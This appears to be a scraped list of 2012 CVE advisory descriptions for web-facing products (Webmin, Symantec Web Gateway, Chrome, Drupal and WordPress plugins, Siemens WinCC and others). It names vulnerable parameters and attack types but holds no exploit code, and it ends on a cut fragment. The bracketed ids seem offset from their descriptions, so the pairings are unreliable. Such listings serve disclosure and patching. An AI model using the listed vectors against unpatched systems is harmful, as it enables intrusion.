OZW Web Server devices OZW672., OZW772., and OZW775 with firmware before 4 have an unspecified default password, which makes it easier for remote attackers to obtain administrative access via a network session. [CVE-2012-3013] WAGO I/O System 758 model 758-870, 758-874, 758-875, and 758-876 Industrial PC (IPC) devices have default passwords for unspecified Web Based Management accounts, which makes it easier for remote attackers to obtain administrative access via a TCP session. [CVE-2012-3011] Directory traversal vulnerability in the web server in Fultek WinTr Scada 4.0.5 and earlier allows remote attackers to read arbitrary files via a crafted request. [CVE-2012-3010] rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6 through 3.5 SP1 allows remote attackers to cause a denial of service (memory corruption and service crash) or possibly execute arbitrary code via long input data, a different vulnerability than CVE-2012-3021 and CVE-2012-3026. [CVE-2012-3008] Stack-based buffer overflow in OSIsoft PI OPC DA Interface before 2.3.20.9 allows remote authenticated users to execute arbitrary code by sending packet data during the processing of messages associated with OPC items. [CVE-2012-3003] Open redirect vulnerability in an unspecified web application in Siemens WinCC 7.0 SP3 before Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a GET request. [CVE-2012-3001] Mutiny Standard before 4.5-1.12 allows remote attackers to execute arbitrary commands via the network-interface menu, related to a "command injection vulnerability." [CVE-2012-2995] Multiple cross-site scripting (XSS) vulnerabilities in Trend Micro InterScan Messaging Security Suite 7.1-Build_Win32_1394 allow remote attackers to inject arbitrary web script or HTML via (1) the wrsApprovedURL parameter to addRuleAttrWrsApproveUrl.imss or (2) the src parameter to initUpdSchPage.imss. [CVE-2012-2985] Cross-site scripting (XSS) vulnerability in InsertDocument.aspx in CuteSoft Cute Editor 6.4 allows remote authenticated users to inject arbitrary web script or HTML via the _UploadID parameter. [CVE-2012-2984] Multiple cross-site scripting (XSS) vulnerabilities in monitor/m_overview.ink in Websense Content Gateway before 7.7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) menu or (2) item parameter. [CVE-2012-2983] file/edit_html.cgi in Webmin 1.590 and earlier does not perform an authorization check before showing a file's unedited contents, which allows remote attackers to read arbitrary files via the file field. [CVE-2012-2982] file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a \| (pipe) character. [CVE-2012-2981] Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary Perl code via a crafted file associated with the type (aka monitor type name) parameter. [CVE-2012-2977] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to change arbitrary passwords via crafted input to an application script. [CVE-2012-2976] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary shell commands via crafted input to application scripts, related to an "injection" issue. [CVE-2012-2975] Cross-site scripting (XSS) vulnerability in the traffic overview page on the F5 ASM appliance 10.0.0 through 11.2.0 HF2 allows remote attackers to inject arbitrary web script or HTML via crafted requests that are later listed on a summary page. [CVE-2012-2961] SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2012-2960] Cross-site scripting (XSS) vulnerability in the import functionality in HP ArcSight Connector appliance 6.2.0.6244.0 and ArcSight Logger appliance 5.2.0.6288.0 allows remote attackers to inject arbitrary web script or HTML via a crafted file. [CVE-2012-2957] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows local users to gain privileges by modifying files, related to a "file inclusion" issue. [CVE-2012-2953] The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary commands via crafted input to application scripts. [CVE-2012-2941] Cross-site scripting (XSS) vulnerability in search/ in Yandex.Server 2010 9.0 Enterprise allows remote attackers to inject arbitrary web script or HTML via the text parameter. [CVE-2012-2938] Multiple cross-site scripting (XSS) vulnerabilities in Travelon Express 6.2.2 allow remote attackers to inject arbitrary web script or HTML via the holiday name field to (1) holiday_add.php or (2) holiday_view.php. [CVE-2012-2936] Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) user or (2) page parameter to (a) admin/admin_comments.php or (b) admin/admin_links.php [CVE-2012-2935] Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Shop/Application/Checkout/pages/main.php in OSCommerce Online Merchant 3.0.2 allows remote attackers to inject arbitrary web script or HTML via the value_title parameter, a different vulnerability than CVE-2012-1059. [CVE-2012-2920] Cross-site scripting (XSS) vulnerability in the userphoto_options_page function in user-photo.php in the User Photo plugin before 0.9.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to wp-admin/options-general.php. NOTE: some of these details are obtained from third party information. [CVE-2012-2918] Cross-site scripting (XSS) vulnerability in Upload/engine.php in Chevereto 1.91 allows remote attackers to inject arbitrary web script or HTML via the v parameter. [CVE-2012-2917] Cross-site scripting (XSS) vulnerability in the Share and Follow plugin 1.80.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the CDN API Key (cnd-key) in a share-and-follow-menu page to wp-admin/admin.php. [CVE-2012-2916] Cross-site scripting (XSS) vulnerability in sabre_class_admin.php in the SABRE plugin before 2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the active_option parameter to wp-admin/tools.php. [CVE-2012-2914] Cross-site scripting (XSS) vulnerability in captchademo.php in Unijimpe Captcha allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2012-2913] Multiple cross-site scripting (XSS) vulnerabilities in the Leaflet plugin 0.0.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) leaflet_layer.php or (2) leaflet_marker.php, as reachable through wp-admin/admin.php. [CVE-2012-2912] Multiple cross-site scripting (XSS) vulnerabilities in the LeagueManager plugin 3.7 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter in the show-league page or (2) season parameter in the team page to wp-admin/admin.php. [CVE-2012-2911] Cross-site scripting (XSS) vulnerability in backupDB.php in SiliSoftware backupDB() 1.2.7a allows remote attackers to inject arbitrary web script or HTML via the onlyDB parameter. [CVE-2012-2910] Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware phpThumb() 1.7.11 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter to demo/phpThumb.demo.random.php or (2) title parameter to demo/phpThumb.demo.showpic.php. [CVE-2012-2909] Multiple cross-site scripting (XSS) vulnerabilities in Viscacha 0.8.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) text field in the Private Messages System, (2) Bad Word field in Zensur, or (3) Portal or (4) Topic field in Kommentar. [CVE-2012-2907] Cross-site scripting (XSS) vulnerability in the aberdeen_breadcrumb function in template.php in the Aberdeen theme 6.x-1.x before 6.x-1.11 for Drupal, when set to append the content title to the breadcrumb, allows remote attackers to inject arbitrary web script or HTML via the content title in a breadcrumb. [CVE-2012-2906] Multiple cross-site scripting (XSS) vulnerabilities in artpublic/recommandation/index.php in Artiphp CMS 5.5.0 Neo (r422) allow remote attackers to inject arbitrary web script or HTML via the (1) add_img_name_post, (2) asciiart_post, (3) expediteur, (4) titre_sav, or (5) z39d27af885b32758ac0e7d4014a61561 parameter. [CVE-2012-2905] Artiphp CMS 5.5.0 Neo (r422) stores database backups with predictable names under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request. [CVE-2012-2904] player.swf in LongTail JW Player 5.9 allows remote attackers to conduct cross-site scripting (XSS) attacks to inject arbitrary web script or HTML via multiple "javascript:" sequences in the debug parameter. [CVE-2012-2903] Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 7.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to group.php, or the (2) target_language or (3) target_flag parameter to translate.php. [CVE-2012-2901] Cross-site scripting (XSS) vulnerability in the Profile List in the Joomla Content Editor (JCE) component before 2.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the search parameter to administrator/index.php. [CVE-2012-2896] Integer overflow in the WebGL implementation in Google Chrome before 22.0.1229.79 on Mac OS X allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2012-2889] Cross-site scripting (XSS) vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to inject arbitrary web script or HTML via vectors involving frames, aka "Universal XSS (UXSS)." [CVE-2012-2886] Cross-site scripting (XSS) vulnerability in Google Chrome before 22.0.1229.79 allows remote attackers to inject arbitrary web script or HTML via vectors related to the Google V8 bindings, aka "Universal XSS (UXSS)." [CVE-2012-2872] Cross-site scripting (XSS) vulnerability in an SSL interstitial page in Google Chrome before 21.0.1180.89 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2860] The date-picker implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2858] Buffer overflow in the WebP decoder in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted WebP image. [CVE-2012-2854] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to obtain potentially sensitive information about pointer values by leveraging access to a WebUI renderer process. [CVE-2012-2853] The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not properly interact with the Chrome Web Store, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted web site. [CVE-2012-2848] The drag-and-drop implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to bypass intended file access restrictions via a crafted web site. [CVE-2012-2847] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not request user confirmation before continuing a large series of downloads, which allows user-assisted remote attackers to cause a denial of service (resource consumption) via a crafted web site. [CVE-2012-2819] The texSubImage2D implementation in the WebGL subsystem in Google Chrome before 20.0.1132.43 does not properly handle uploads to floating-point textures, which allows remote attackers to cause a denial of service (assertion failure and application crash) or possibly have unspecified other impact via a crafted web page, as demonstrated by certain WebGL performance tests, aka rdar problem 11520387. [CVE-2012-2769] Multiple cross-site scripting (XSS) vulnerabilities in the topic administration page in the Extension::MobileUI extension before 1.02 for Best Practical Solutions RT 3.8.x and in Best Practical Solutions RT before 4.0.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2768] Multiple cross-site scripting (XSS) vulnerabilities in the topic administration page in the RTFM extension 2.0.4 through 2.4.3 for Best Practical Solutions RT allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2759] Cross-site scripting (XSS) vulnerability in login-with-ajax.php in the Login With Ajax (aka login-with-ajax) plugin before 3.0.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the callback parameter in a lostpassword action to wp-login.php. [CVE-2012-2741] Cross-site scripting (XSS) vulnerability in public_html/lists/admin/ in phpList before 2.10.18 allows remote attackers to inject arbitrary web script or HTML via the num parameter in a reconcileusers action. [CVE-2012-2735] Session fixation vulnerability in Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, Realtime, and Grid (MRG) 2.0, allows remote attackers to hijack web sessions via a crafted session cookie. [CVE-2012-2731] The Ubercart AJAX Cart 6.x-2.x before 6.x-2.1 for Drupal stores the PHP session id in the JavaScript settings array in page loads, which might allow remote attackers to obtain sensitive information by sniffing or reading the cache of the HTML of a webpage. [CVE-2012-2727] Open redirect vulnerability in the Janrain Capture module 6.x-1.0 and 7.x-1.0 for Drupal, when synchronizing user data, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the destination parameter. [CVE-2012-2726] Cross-site scripting (XSS) vulnerability in the Protest module 6.x-1.x before 6.x-1.2 or 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with the "administer protest" permission to inject arbitrary web script or HTML via the protest_body parameter. [CVE-2012-2723] Cross-site scripting (XSS) vulnerability in the Maestro module 7.x-1.x before 7.x-1.2 for Drupal allows remote authenticated users with maestro admin permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2722] The node selection interface in the WYSIWYG editor (CKEditor) in the Node Embed module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.0 for Drupal does not properly check permissions, which allows remote attackers to bypass intended access restrictions and read node titles. [CVE-2012-2717] Multiple cross-site scripting (XSS) vulnerabilities in the Mobile Tools module 6.x-2.x before 6.x-2.3 for Drupal allow remote attackers to inject arbitrary web script or HTML via the (1) Mobile URL field or (2) Desktop URL field to the General configuration page, or the (3) message to the Mobile Tools block message options. [CVE-2012-2715] Cross-site scripting (XSS) vulnerability in the themes_links function in template.php in the Amadou theme module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to class attributes in a list of links. [CVE-2012-2713] Cross-site request forgery (CSRF) vulnerability in the BrowserID (Mozilla Persona) module 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to hijack the authentication of arbitrary users for requests that login a user to another web site. [CVE-2012-2712] Multiple cross-site scripting (XSS) vulnerabilities in the Search API module 7.x-1.x before 7.x-1.1 for Drupal, when supporting manual entry of field identifiers, allow remote attackers to inject arbitrary web script or HTML via vectors related to thrown exceptions and logging errors. [CVE-2012-2711] Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy List module 6.x-1.x before 6.x-1.4 for Drupal allow remote authenticated users with create or edit taxonomy terms permissions to inject arbitrary web script or HTML via vectors related to taxonomy information. [CVE-2012-2710] Cross-site scripting (XSS) vulnerability in the Zen module 6.x-1.x before 6.x-1.1 for Drupal, when "Append the content title to the end of the breadcrumb" is enabled, allows remote attackers to inject arbitrary web script or HTML via the content title in a breadcrumb. [CVE-2012-2708] Cross-site scripting (XSS) vulnerability in the _hosting_task_log_table function in modules/hosting/task/hosting_task.module in the Hostmaster (Aegir) module 6.x-1.x before 6.x-1.9 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via a Drush log message in a provision task log. [CVE-2012-2706] Cross-site scripting (XSS) vulnerability in the Post Affiliate Pro (PAP) module for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors related to user registration. [CVE-2012-2703] Cross-site scripting (XSS) vulnerability in the Advertisement module 6.x-2.x before 6.x-2.3 for Drupal, when debug mode is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors related to the "$conf variable in settings.php." [CVE-2012-2698] Cross-site scripting (XSS) vulnerability in the outputPage function in includes/SkinTemplate.php in MediaWiki before 1.17.5, 1.18.x before 1.18.4, and 1.19.x before 1.19.1 allows remote attackers to inject arbitrary web script or HTML via the uselang parameter to index.php/Main_page. [CVE-2012-2694] actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain "['xyz', nil]" values, a related issue to CVE-2012-2660. [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list. [CVE-2012-2683] Multiple cross-site scripting (XSS) vulnerabilities in Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, Realtime, and Grid (MRG) 2.0, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) "error message displays" or (2) "in source HTML on certain pages." [CVE-2012-2680] Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, Realtime, and Grid (MRG) 2.0, does not properly restrict access to resources, which allows remote attackers to obtain sensitive information via unspecified vectors related to (1) "web pages," (2) "export functionality," and (3) "image viewing." [CVE-2012-2671] The Rack::Cache rubygem 0.3.0 through 1.1 caches Set-Cookie and other sensitive headers, which allows attackers to obtain sensitive cookie information, hijack web sessions, or have other unspecified impact by accessing the cache. [CVE-2012-2667] Session fixation vulnerability in lib/user/sfBasicSecurityUser.class.php in SensioLabs Symfony before 1.4.18 allows remote attackers to hijack web sessions via vectors related to the regenerate method and unspecified "database backed session classes." [CVE-2012-2662] Multiple cross-site scripting (XSS) vulnerabilities in Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate System allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to the (1) System Agent or (2) End Entity pages. [CVE-2012-2660] actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain "[nil]" values, a related issue to CVE-2012-2694. [CVE-2012-2649] The Sleipnir Mobile application 2.2.0 and earlier and Sleipnir Mobile Black Edition application 2.2.0 and earlier for Android allow remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site. [CVE-2012-2648] Cross-site scripting (XSS) vulnerability in the GoodReader app 3.16 and earlier for iOS on the iPad, and 3.15.1 and earlier for iOS on the iPhone and iPod touch, allows remote attackers to inject arbitrary web script or HTML via vectors involving use of this app in conjunction with a web browser. [CVE-2012-2647] Yahoo! Toolbar 1.0.0.5 and earlier for Chrome and Safari allows remote attackers to modify the configured search URL, and intercept search terms, via a crafted web page. [CVE-2012-2646] The Sleipnir Mobile application before 2.1.0 and Sleipnir Mobile Black Edition application before 2.1.0 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-2645] The Yahoo! Japan Yahoo! Browser application 1.2.0 and earlier for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-2644] Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 and earlier for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-2642. [CVE-2012-2643] Cross-site scripting (XSS) vulnerability in KENT-WEB YY-BOARD before 6.4 allows remote attackers to inject arbitrary web script or HTML via a crafted form entry. [CVE-2012-2642] Cross-site scripting (XSS) vulnerability in the MT4i plugin 3.1 beta 4 and earlier for Movable Type allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-2644. [CVE-2012-2641] Cross-site scripting (XSS) vulnerability in Zenphoto before 1.4.3 allows remote attackers to inject arbitrary web script or HTML by triggering improper interaction with an unspecified library. [CVE-2012-2638] Cross-site scripting (XSS) vulnerability in SmallPICT.cgi in SmallPICT before 2.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2637] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 and earlier might allow remote attackers to inject arbitrary web script or HTML via a crafted cookie. [CVE-2012-2636] Cross-site scripting (XSS) vulnerability in KENT-WEB WEB PATIO 4.04 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2635] The Dolphin Browser HD application before 7.6 and Dolphin for Pad application before 1.0.1 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application. [CVE-2012-2634] Cross-site scripting (XSS) vulnerability in FeedDemon before 4.0, when the feed preview option is enabled, allows remote attackers to inject arbitrary web script or HTML via a feed. [CVE-2012-2633] Cross-site scripting (XSS) vulnerability in wassup.php in the WassUp plugin before 1.8.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2012-2631] Cross-site scripting (XSS) vulnerability in WEBLOGIC @WEB ShoppingCart before 1.5.2.0, and @WEB ShoppingCart T 1.5.0.1 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2627] d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request. [CVE-2012-2626] cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. [CVE-2012-2605] Multiple cross-site request forgery (CSRF) vulnerabilities in the administrative interface in Bradford Network Sentry before 5.3.3 allow remote attackers to hijack the authentication of administrators for requests that (1) insert XSS sequences or (2) send messages to clients. [CVE-2012-2598] Buffer overflow in the DiagAgent web server in Siemens WinCC 7.0 SP3 through Update 2 allows remote attackers to cause a denial of service (agent outage) via crafted input. [CVE-2012-2596] The XPath functionality in unspecified web applications in Siemens WinCC 7.0 SP3 before Update 2 does not properly handle special characters in parameters, which allows remote authenticated users to read or modify settings via a crafted URL, related to an "XML injection" attack. [CVE-2012-2595] Multiple cross-site scripting (XSS) vulnerabilities in unspecified web applications in Siemens WinCC 7.0 SP3 before Update 2 allow remote attackers to inject arbitrary web script or HTML via vectors involving special characters in parameters. [CVE-2012-2590] Multiple cross-site scripting (XSS) vulnerabilities in ESCON SupportPortal Professional Edition 3.0 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted SRC attribute of an IFRAME element, (3) a crafted CONTENT attribute of an HTTP-EQUIV="Set-Cookie" META element, or (4) an innerHTML attribute within an XML document. [CVE-2012-2587] Multiple cross-site scripting (XSS) vulnerabilities in AfterLogic MailSuite Pro 6.3 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with a crafted SRC attribute of (1) an IFRAME element or (2) a SCRIPT element. [CVE-2012-2586] Multiple cross-site scripting (XSS) vulnerabilities in Mailtraq 2.17.3.3150 allow remote attackers to inject arbitrary web script or HTML via an e-mail message subject with (1) a JavaScript alert function used in conjunction with the fromCharCode method or (2) a SCRIPT element [CVE-2012-2585] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ServiceDesk Plus 8.1 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, or (4) a crafted SRC attribute of an IFRAME element, or an e-mail message subject with (5) a SCRIPT element, (6) a CSS expression property in the STYLE attribute of an arbitrary element, (7) a crafted SRC attribute of an IFRAME element, (8) a crafted CONTENT attribute of an HTTP-EQUIV="refresh" META element, or (9) a data: URL in the CONTENT attribute of an HTTP-EQUIV="refresh" META element. [CVE-2012-2584] Multiple cross-site scripting (XSS) vulnerabilities in Alt-N MDaemon Free 12.5.4 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) the Cascading Style Sheets (CSS) expression property in conjunction with a CSS comment within the STYLE attribute of an IMG element, (2) the CSS expression property in conjunction with multiple CSS comments within the STYLE attribute of an arbitrary element, or (3) an innerHTML attribute within an XML document. [CVE-2012-2582] Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.13, 3.0.x before 3.0.15, and 3.1.x before 3.1.9, and OTRS ITSM 2.1.x before 2.1.5, 3.0.x before 3.0.6, and 3.1.x before 3.1.6, allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a Cascading Style Sheets (CSS) expression property in the STYLE attribute of an arbitrary element or (2) UTF-7 text in an HTTP-EQUIV="CONTENT-TYPE" META element. [CVE-2012-2578] Multiple cross-site scripting (XSS) vulnerabilities in SmarterMail 9.2 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a JavaScript alert function used in conjunction with the fromCharCode method, (2) a SCRIPT element, (3) a Cascading Style Sheets (CSS) expression property in the STYLE attribute of an arbitrary element, or (4) an innerHTML attribute within an XML document. [CVE-2012-2577] Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds Orion Network Performance Monitor (NPM) before 10.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) syslocation, (2) syscontact, or (3) sysName field of an snmpd.conf file. [CVE-2012-2575] Cross-site scripting (XSS) vulnerability in NetWin SurgeMail 6.0a4 allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of an IFRAME element in the body of an HTML e-mail message. [CVE-2012-2574] SQL injection vulnerability in the management console in Symantec Web Gateway 5.0.x before 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to a "blind SQL injection" issue. [CVE-2012-2573] Multiple cross-site scripting (XSS) vulnerabilities in T-dah WebMail 3.2.0-2.3 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, (4) an ONLOAD attribute of a BODY element, (5) a crafted SRC attribute of an IFRAME element, (6) a crafted CONTENT attribute of an HTTP-EQUIV="refresh" META element, or (7) a data: URL in the CONTENT attribute of an HTTP-EQUIV="refresh" META element. [CVE-2012-2571] Multiple cross-site scripting (XSS) vulnerabilities in WinWebMail Server 3.8.1.6 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, (4) a crafted SRC attribute of an IFRAME element, or (5) UTF-7 text in an HTTP-EQUIV="CONTENT-TYPE" META element. [CVE-2012-2570] Cross-site scripting (XSS) vulnerability in products_map.php in X-Cart Gold 4.5 allows remote attackers to inject arbitrary web script or HTML via the symb parameter. [CVE-2012-2568] d41d8cd98f00b204e9800998ecf8427e.php in the management web server on the Seagate BlackArmor device allows remote attackers to change the administrator password via unspecified vectors. [CVE-2012-2566] Bloxx Web Filtering before 5.0.14 does not properly interpret X-Forwarded-For headers during access-control and logging operations for HTTPS connection attempts, which allows remote attackers to bypass intended IP address and domain restrictions, and trigger misleading log entries, via a crafted header. [CVE-2012-2565] Bloxx Web Filtering before 5.0.14 does not use a salt during calculation of a password hash, which makes it easier for context-dependent attackers to determine cleartext passwords via a rainbow-table approach. [CVE-2012-2563] Multiple cross-site scripting (XSS) vulnerabilities in Bloxx Web Filtering before 5.0.14 allow (1) remote attackers to inject arbitrary web script or HTML via web traffic that is examined within the Bloxx Reports component, and allow (2) remote authenticated administrators to inject arbitrary web script or HTML via vectors involving administrative menu functions. [CVE-2012-2557] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "cloneNode Use After Free Vulnerability." [CVE-2012-2552] Cross-site scripting (XSS) vulnerability in the SQL Server Report Manager in Microsoft SQL Server 2000 Reporting Services SP2 and SQL Server 2005 SP4, 2008 SP2 and SP3, 2008 R2 SP1, and 2012 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Reflected XSS Vulnerability." [CVE-2012-2548] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Layout Use After Free Vulnerability." [CVE-2012-2546] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Event Listener Use After Free Vulnerability." [CVE-2012-2536] Cross-site scripting (XSS) vulnerability in Microsoft Systems Management Server 2003 SP3 and System Center Configuration Manager 2007 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Reflected XSS Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-2500] Cisco AnyConnect Secure Mobility Client 3.0 before 3.0.08057 does not verify the certificate name in an X.509 certificate during WebLaunch of IPsec, which allows man-in-the-middle attackers to spoof servers via a crafted certificate, aka Bug ID CSCtz29470. [CVE-2012-2496] A certain Java applet in the VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 3.x before 3.0 MR7 on 64-bit Linux platforms does not properly restrict use of Java components, which allows remote attackers to execute arbitrary code via a crafted web site, aka Bug ID CSCty45925. [CVE-2012-2494] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 and 3.x before 3.0 MR8 does not compare the timestamp of offered software to the timestamp of installed software, which allows remote attackers to force a version downgrade by using (1) ActiveX or (2) Java components to offer signed code that corresponds to an older software release, aka Bug ID CSCtw48681. [CVE-2012-2493] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 on Windows, and 2.x before 2.5 MR6 and 3.x before 3.0 MR8 on Mac OS X and Linux, does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug ID CSCtw47523. [CVE-2012-2474] Memory leak on Cisco Adaptive Security Appliances (ASA) 5500 series devices with software 8.2 through 8.4 allows remote authenticated users to cause a denial of service (memory consumption and blank response page) by using the clientless WebVPN feature, aka Bug ID CSCth34278. [CVE-2012-2447] Cross-site request forgery (CSRF) vulnerability in accountmgr/adminupdate.php in the WebAdmin Portal in Netsweeper allows remote attackers to hijack the authentication of administrators for requests that create administrative accounts via an add action. [CVE-2012-2446] Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in the WebAdmin Portal in Netsweeper allows remote attackers to inject arbitrary web script or HTML via the group parameter in a lookup action. [CVE-2012-2438] ar web content 